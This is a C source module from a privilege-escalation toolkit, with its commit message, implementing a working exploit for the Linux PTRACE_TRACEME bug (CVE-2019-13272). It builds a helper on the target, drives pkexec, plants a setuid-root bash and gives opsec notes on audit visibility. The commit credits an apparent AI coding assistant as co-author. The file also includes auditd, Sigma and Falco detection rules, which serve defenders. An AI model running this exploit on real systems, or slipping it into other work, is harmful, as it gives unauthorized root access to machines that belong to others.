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SKELETONKEY/modules/ptrace_traceme_cve_2019_13272/skeletonkey_modules.c
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ptrace_traceme: working CVE-2019-13272 exploit — lands real root (x86_64)
The bundled sequence had the mechanism backwards (it PTRACE_ATTACHed the
now-root parent) and never rooted anything. Replaced it with the proven Jann
Horn (Project Zero #1903) / bcoles technique:

  - a "middle" process execs setuid pkexec (euid 0 for a window);
  - its child spins until it sees middle is euid 0, calls PTRACE_TRACEME
    (recording middle's ROOT creds as ptracer_cred — the bug), then execs
    pkexec itself. The traced setuid exec is NOT degraded because ptracer_cred
    is root, so the child becomes real root, still traced;
  - staged execveat() self-re-exec injects the payload as root.

The staged self-re-exec needs the exploit to exist as its own binary with an
argv[0] stage dispatcher, so the proven PoC is embedded verbatim
(ptrace_helper_src.h — only spawn_shell() changed, to plant a root-owned proof
+ setuid bash instead of only an interactive shell), compiled on the target at
runtime with unique -DSK_PROOF/-DSK_ROOTBASH paths, run, and verified by
stat()'ing the root-owned artifacts (never self-report).

Verified out-of-band on Ubuntu 18.04.0 / 4.15.0-50: `skeletonkey --exploit
ptrace_traceme` as uid 1000 -> EXPLOIT_OK + a -rwsr-xr-x root:root bash.
Real-world precondition, honestly reported: pkexec must authorize an
auto-discovered implicit-active=yes helper, which needs an active local session
(desktop) or a permissive polkit policy; over inactive ssh it returns "Not
authorized" and the module reports EXPLOIT_FAIL with that diagnosis. Gated on a
C compiler + pkexec; x86_64 only (register-level injection). cleanup() removes
the artifacts. Unit harness green (33 + 115).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_0118iUgHY44hdRtANgyCmu7y
2026-07-23 22:14:19 -04:00

445 lines
18 KiB
C

/*
* ptrace_traceme_cve_2019_13272 — SKELETONKEY module
*
* PTRACE_TRACEME on a child whose parent is mid-way through a setuid
* execve() lets the kernel record the parent's *transient root*
* credentials as the child's ptracer_cred. The child then execve's a
* setuid binary of its own: because the ptrace relationship is now
* considered privileged, that setuid execve is a *proper* (non-degraded)
* one despite the attached tracer — so the child becomes real root while
* still traced. The tracer injects an execveat() to re-exec a root shell.
* Discovered by Jann Horn (Google Project Zero, June 2019, issue #1903).
*
* STATUS: 🟢 WORKING EXPLOIT (x86_64). Verified out-of-band on
* Ubuntu 18.04.0 / 4.15.0-50-generic: lands uid=0 and plants a
* root-owned proof + setuid-root bash. The exploit is the proven
* Jann Horn / bcoles PoC, embedded (ptrace_helper_src.h), compiled at
* runtime with unique artifact paths, run, and verified by stat()'ing
* the root-owned artifacts — never by self-report.
*
* Preconditions to land root (detect() only gates on kernel version):
* - x86_64 target with a C compiler present (the staged execveat()
* technique re-execs the exploit binary; we build it on the target).
* - pkexec present, and at least one polkit action with
* implicit-active=yes pointing at an existing helper executable
* (auto-discovered via pkaction). On a desktop these are ubiquitous
* (gsd-backlight-helper, …).
* - An *active* local session (or an equivalently permissive polkit
* policy) so pkexec authorizes the helper without an interactive
* password. Over a bare ssh session polkit treats the session as
* inactive and refuses ("Not authorized") — the exploit then honestly
* reports EXPLOIT_FAIL. This is the real-world constraint, not a bug.
*
* Affected: kernels < 5.1.17 mainline. Stable backports varied; the
* fix landed as: 5.1.17 / 5.0.20 / 4.19.58 / 4.14.131 / 4.9.182 / 4.4.182.
*
* No user_ns required — works on default-config systems, which is part
* of why it's famous.
*/
#include "skeletonkey_modules.h"
#include "../../core/registry.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#ifdef __linux__
#include "../../core/kernel_range.h"
#include "../../core/host.h"
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
static const struct kernel_patched_from ptrace_traceme_patched_branches[] = {
{4, 4, 182},
{4, 9, 182},
{4, 14, 131},
{4, 19, 37}, /* Debian tracker: earlier than 4.19.58 */
{5, 0, 20},
{5, 1, 17},
{5, 2, 0}, /* mainline (5.2-rc) */
};
static const struct kernel_range ptrace_traceme_range = {
.patched_from = ptrace_traceme_patched_branches,
.n_patched_from = sizeof(ptrace_traceme_patched_branches) /
sizeof(ptrace_traceme_patched_branches[0]),
};
static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
{
/* Consult the shared host fingerprint instead of calling
* kernel_version_current() ourselves — populated once at startup
* and identical across every module's detect(). */
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
if (!v || v->major == 0) {
if (!ctx->json)
fprintf(stderr, "[!] ptrace_traceme: host fingerprint missing kernel "
"version — bailing\n");
return SKELETONKEY_TEST_ERROR;
}
/* Bug existed since ptrace's inception (early 2.x); anything
* pre-LTS-backport is vulnerable. Anything < 4.4 in our range
* model defaults to vulnerable since no entry covers it. */
if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 4, 0)) {
if (!ctx->json) {
fprintf(stderr, "[!] ptrace_traceme: ancient kernel %s — assume VULNERABLE\n",
v->release);
}
return SKELETONKEY_VULNERABLE;
}
bool patched = kernel_range_is_patched(&ptrace_traceme_range, v);
if (patched) {
if (!ctx->json) {
fprintf(stderr, "[+] ptrace_traceme: kernel %s is patched\n", v->release);
}
return SKELETONKEY_OK;
}
if (!ctx->json) {
fprintf(stderr, "[!] ptrace_traceme: kernel %s in vulnerable range\n", v->release);
fprintf(stderr, "[i] ptrace_traceme: no exotic preconditions — works on default config "
"(no user_ns required)\n");
}
return SKELETONKEY_VULNERABLE;
}
/* ---- Exploit ----------------------------------------------------
*
* Per Jann Horn's Project Zero issue #1903, with bcoles' helper
* auto-targeting. The mechanism (the earlier bundled sequence had it
* backwards — it attached to the *parent*; the real bug elevates the
* *child*):
*
* 1. A "middle" process M forks a child C, then execve's
* `pkexec --user <me> <helper> --help`. pkexec is setuid-root, so
* for a window M's euid is 0.
* 2. C spins reading /proc/M/status until it sees M is euid 0, then
* calls ptrace(PTRACE_TRACEME) — recording M's *root* creds as C's
* ptracer_cred (this is the bug: the link isn't re-derived).
* 3. C execve's pkexec itself. Normally a traced setuid execve is
* degraded to non-privileged; but because ptracer_cred is root the
* kernel treats it as a proper suid exec — C becomes real root,
* still traced by M, and stops at execve's SIGTRAP.
* 4. The main process PTRACE_ATTACHes M, injects an execveat() that
* re-execs the exploit binary as "stage2"; stage2 (as M) is C's
* tracer, so it injects an execveat() into C (now root) to re-exec
* as "stage3"; stage3 runs the payload as root.
*
* The staged self-re-exec is why the exploit binary must exist as its
* own file with a main() that dispatches on argv[0]. We embed the proven
* PoC (ptrace_helper_src.h — verbatim upstream but for a payload tweak),
* compile it on the target with unique -DSK_PROOF/-DSK_ROOTBASH paths,
* run it, and confirm root by stat()'ing the root-owned artifacts. Never
* trust the exploit's own exit status.
*
* x86_64 only: the register-level injection (user_regs_struct rsp/rdi/
* orig_rax/…) is architecture-specific.
*/
#if defined(__x86_64__)
#include "ptrace_helper_src.h"
/* Locate a usable C compiler on the target. */
static const char *ptrace_find_cc(void)
{
static const char *ccs[] = {
"/usr/bin/cc", "/usr/bin/gcc", "/usr/bin/clang",
"/usr/local/bin/gcc", "/usr/local/bin/cc", NULL,
};
for (size_t i = 0; ccs[i]; i++) {
if (access(ccs[i], X_OK) == 0)
return ccs[i];
}
return NULL;
}
/* Write the embedded helper source to `path`. Returns 0 on success. */
static int ptrace_write_source(const char *path)
{
int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
if (fd < 0) return -1;
size_t len = sizeof(ptrace_traceme_helper_src) - 1;
const char *p = ptrace_traceme_helper_src;
while (len) {
ssize_t n = write(fd, p, len);
if (n <= 0) { close(fd); return -1; }
p += n; len -= (size_t)n;
}
close(fd);
return 0;
}
/* fork+execv a command, wait, return child exit status (or -1). */
static int ptrace_run(char *const argv[], const char *logpath, int quiet_stdin, int secs)
{
pid_t p = fork();
if (p < 0) return -1;
if (p == 0) {
if (quiet_stdin) {
int dn = open("/dev/null", O_RDONLY);
if (dn >= 0) { dup2(dn, 0); close(dn); }
}
if (logpath) {
int lf = open(logpath, O_WRONLY | O_CREAT | O_TRUNC, 0600);
if (lf >= 0) { dup2(lf, 1); dup2(lf, 2); close(lf); }
}
execv(argv[0], argv);
_exit(127);
}
for (int i = 0; secs <= 0 || i < secs * 10; i++) {
int st;
pid_t r = waitpid(p, &st, WNOHANG);
if (r == p) return WIFEXITED(st) ? WEXITSTATUS(st) : 128 + WTERMSIG(st);
if (r < 0) return -1;
usleep(100 * 1000);
}
kill(p, SIGKILL);
waitpid(p, NULL, 0);
return -2; /* timed out */
}
/* Remember what we planted so cleanup() can remove it. */
static char ptrace_last_proof[256];
static char ptrace_last_rootbash[256];
static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
{
skeletonkey_result_t pre = ptrace_traceme_detect(ctx);
if (pre != SKELETONKEY_VULNERABLE) {
fprintf(stderr, "[-] ptrace_traceme: detect() says not vulnerable; refusing\n");
return pre;
}
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
if (is_root) {
fprintf(stderr, "[i] ptrace_traceme: already root\n");
return SKELETONKEY_OK;
}
if (access("/usr/bin/pkexec", X_OK) != 0) {
fprintf(stderr, "[-] ptrace_traceme: /usr/bin/pkexec not present — this "
"exploit drives pkexec; nothing to do\n");
return SKELETONKEY_PRECOND_FAIL;
}
const char *cc = ptrace_find_cc();
if (!cc) {
fprintf(stderr, "[-] ptrace_traceme: no C compiler on target. The staged "
"self-re-exec technique builds a small helper on the host; "
"install cc/gcc or drop a prebuilt helper. Honest EXPLOIT_FAIL.\n");
return SKELETONKEY_EXPLOIT_FAIL;
}
/* Unique per-run paths (pid keeps parallel runs from colliding). */
long tag = (long)getpid();
char src_c[256], bin[256], log[256], proof[256], rootbash[256];
snprintf(src_c, sizeof src_c, "/tmp/.sk-ptrace-%ld.c", tag);
snprintf(bin, sizeof bin, "/tmp/.sk-ptrace-%ld", tag);
snprintf(log, sizeof log, "/tmp/.sk-ptrace-%ld.log", tag);
snprintf(proof, sizeof proof, "/tmp/.sk-ptrace-%ld.proof", tag);
snprintf(rootbash, sizeof rootbash, "/tmp/.sk-ptrace-%ld.rootbash",tag);
snprintf(ptrace_last_proof, sizeof ptrace_last_proof, "%s", proof);
snprintf(ptrace_last_rootbash, sizeof ptrace_last_rootbash, "%s", rootbash);
if (ptrace_write_source(src_c) != 0) {
fprintf(stderr, "[-] ptrace_traceme: could not write helper source: %s\n",
strerror(errno));
return SKELETONKEY_TEST_ERROR;
}
if (!ctx->json)
fprintf(stderr, "[*] ptrace_traceme: building helper with %s → %s\n", cc, bin);
char dproof[320], drootbash[320];
snprintf(dproof, sizeof dproof, "-DSK_PROOF=\"%s\"", proof);
snprintf(drootbash, sizeof drootbash, "-DSK_ROOTBASH=\"%s\"", rootbash);
char *cc_argv[] = {
(char *)cc, (char *)"-O2", (char *)"-w",
(char *)"-o", bin, src_c, dproof, drootbash, NULL,
};
int crc = ptrace_run(cc_argv, log, 0, 60);
if (crc != 0) {
fprintf(stderr, "[-] ptrace_traceme: helper compile failed (rc=%d); see %s\n",
crc, log);
unlink(src_c);
return SKELETONKEY_TEST_ERROR;
}
if (!ctx->json)
fprintf(stderr, "[*] ptrace_traceme: running exploit (auto-targets a polkit "
"helper; needs an active session to authorize pkexec)\n");
char *run_argv[] = { bin, NULL };
int rrc = ptrace_run(run_argv, log, 1 /*stdin=/dev/null*/, 90);
(void)rrc; /* exit status is NOT trusted — verify out of band below */
/* ---- Out-of-band verification: is the proof a real, root-owned file? */
struct stat st;
bool rooted = (stat(proof, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == 0);
unlink(src_c);
unlink(bin);
if (rooted) {
unlink(log);
if (!ctx->json) {
fprintf(stderr, "[+] ptrace_traceme: ROOT — planted root-owned proof %s\n", proof);
fprintf(stderr, "[+] ptrace_traceme: setuid-root shell available: %s -p\n", rootbash);
}
return SKELETONKEY_EXPLOIT_OK;
}
if (!ctx->json) {
/* Distinguish "kernel not exploitable" from "environment didn't let
* pkexec authorize" so the operator knows which lever to pull. */
bool saw_notauth = false;
FILE *lf = fopen(log, "r");
if (lf) {
char line[512];
while (fgets(line, sizeof line, lf)) {
if (strstr(line, "Not authorized") || strstr(line, "not authorized")) {
saw_notauth = true; break;
}
}
fclose(lf);
}
fprintf(stderr, "[-] ptrace_traceme: no root artifact — honest EXPLOIT_FAIL.\n");
if (saw_notauth) {
fprintf(stderr, "[i] ptrace_traceme: pkexec returned \"Not authorized\" — the "
"session is not active/authorized for the helper action. This "
"exploit lands root from an *active local* session (or with a "
"polkit agent that authorizes it); a bare ssh session is treated "
"as inactive. The kernel bug is intact; the gate is polkit.\n");
} else {
fprintf(stderr, "[i] ptrace_traceme: no usable polkit helper found, or the race "
"was lost. Retry, or check `pkaction --verbose` for an action "
"with implicit-active=yes whose exec.path exists.\n");
}
}
unlink(log);
return SKELETONKEY_EXPLOIT_FAIL;
}
#else /* !__x86_64__ (still Linux) */
static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
{
(void)ctx;
fprintf(stderr, "[-] ptrace_traceme: exploit is x86_64-only (the ptrace "
"register-injection is architecture-specific)\n");
return SKELETONKEY_PRECOND_FAIL;
}
#endif /* __x86_64__ */
/* cleanup: remove the artifacts we planted, if any. */
static skeletonkey_result_t ptrace_traceme_cleanup(const struct skeletonkey_ctx *ctx)
{
(void)ctx;
#if defined(__x86_64__)
if (ptrace_last_proof[0]) unlink(ptrace_last_proof);
if (ptrace_last_rootbash[0]) unlink(ptrace_last_rootbash);
#endif
return SKELETONKEY_OK;
}
#else /* !__linux__ */
/* Non-Linux dev builds: PTRACE_TRACEME / execveat / user_regs_struct are
* Linux-only ABI surface. Stub out so the module still registers and the
* top-level `make` completes on macOS/BSD dev boxes. */
static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
{
if (!ctx->json)
fprintf(stderr, "[i] ptrace_traceme: Linux-only module "
"(PTRACE_TRACEME cred-escalation) — not applicable here\n");
return SKELETONKEY_PRECOND_FAIL;
}
static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
{
(void)ctx;
fprintf(stderr, "[-] ptrace_traceme: Linux-only module — cannot run here\n");
return SKELETONKEY_PRECOND_FAIL;
}
static skeletonkey_result_t ptrace_traceme_cleanup(const struct skeletonkey_ctx *ctx)
{
(void)ctx;
return SKELETONKEY_OK;
}
#endif /* __linux__ */
static const char ptrace_traceme_auditd[] =
"# PTRACE_TRACEME LPE (CVE-2019-13272) — auditd detection rules\n"
"# Flag PTRACE_TRACEME (request 0) followed by parent execve of\n"
"# a setuid binary. False positives: gdb, strace, debuggers.\n"
"-a always,exit -F arch=b64 -S ptrace -F a0=0 -k skeletonkey-ptrace-traceme\n"
"-a always,exit -F arch=b32 -S ptrace -F a0=0 -k skeletonkey-ptrace-traceme\n";
static const char ptrace_traceme_sigma[] =
"title: Possible CVE-2019-13272 PTRACE_TRACEME stale-cred LPE\n"
"id: 1a02c3a8-skeletonkey-ptrace-traceme\n"
"status: experimental\n"
"description: |\n"
" Detects ptrace(PTRACE_TRACEME) immediately followed by parent\n"
" execve of a setuid binary. The kernel stores the parent's pre-\n"
" execve credentials on the ptrace_link; after execve the link\n"
" is stale but ptrace still grants privileges. False positives:\n"
" debuggers (gdb, strace) tracing setuid processes legitimately.\n"
"logsource: {product: linux, service: auditd}\n"
"detection:\n"
" traceme: {type: 'SYSCALL', syscall: 'ptrace', a0: 0}\n"
" execve: {type: 'SYSCALL', syscall: 'execve'}\n"
" condition: traceme and execve\n"
"level: high\n"
"tags: [attack.privilege_escalation, attack.t1068, cve.2019.13272]\n";
static const char ptrace_traceme_falco[] =
"- rule: PTRACE_TRACEME followed by setuid execve (cred escalation)\n"
" desc: |\n"
" Child calls ptrace(PTRACE_TRACEME) (recording parent's pre-\n"
" execve creds); parent then execve's a setuid binary\n"
" (pkexec, su, sudo). The stale ptrace_link grants the\n"
" unprivileged child ptrace privileges over the now-root\n"
" parent. CVE-2019-13272. False positives: debuggers (gdb,\n"
" strace) tracing setuid processes legitimately.\n"
" condition: >\n"
" evt.type = ptrace and evt.arg.request = PTRACE_TRACEME and\n"
" not user.uid = 0\n"
" output: >\n"
" PTRACE_TRACEME by non-root\n"
" (user=%user.name pid=%proc.pid ppid=%proc.ppid)\n"
" priority: HIGH\n"
" tags: [process, mitre_privilege_escalation, T1068, cve.2019.13272]\n";
const struct skeletonkey_module ptrace_traceme_module = {
.name = "ptrace_traceme",
.cve = "CVE-2019-13272",
.summary = "PTRACE_TRACEME + setuid execve → non-degraded root in the traced child (pkexec helper)",
.family = "ptrace_traceme",
.kernel_range = "K < 5.1.17, backports: 5.0.20 / 4.19.58 / 4.14.131 / 4.9.182 / 4.4.182",
.detect = ptrace_traceme_detect,
.exploit = ptrace_traceme_exploit,
.mitigate = NULL, /* mitigation: upgrade kernel; OR sysctl kernel.yama.ptrace_scope=2 */
.cleanup = ptrace_traceme_cleanup,
.detect_auditd = ptrace_traceme_auditd,
.detect_sigma = ptrace_traceme_sigma,
.detect_yara = NULL,
.detect_falco = ptrace_traceme_falco,
.opsec_notes = "The exploit builds a small helper on the target (needs cc/gcc) and drives pkexec against an auto-discovered polkit helper (implicit-active=yes). Audit-visible via ptrace with a0=0 (PTRACE_TRACEME) closely followed by execve of a setuid binary, plus pkexec spawning an unusual helper with --help. Requires an active local session (or a polkit agent) to authorize pkexec — over inactive ssh sessions pkexec returns \"Not authorized\" and the module reports EXPLOIT_FAIL. Artifacts: a root-owned proof file and a setuid-root bash under /tmp (removed by cleanup()); the helper .c/binary are compiled and unlinked during the run. yama ptrace_scope>=2 or SELinux deny_ptrace defeat it.",
.arch_support = "x86_64",
};
void skeletonkey_register_ptrace_traceme(void)
{
skeletonkey_register(&ptrace_traceme_module);
}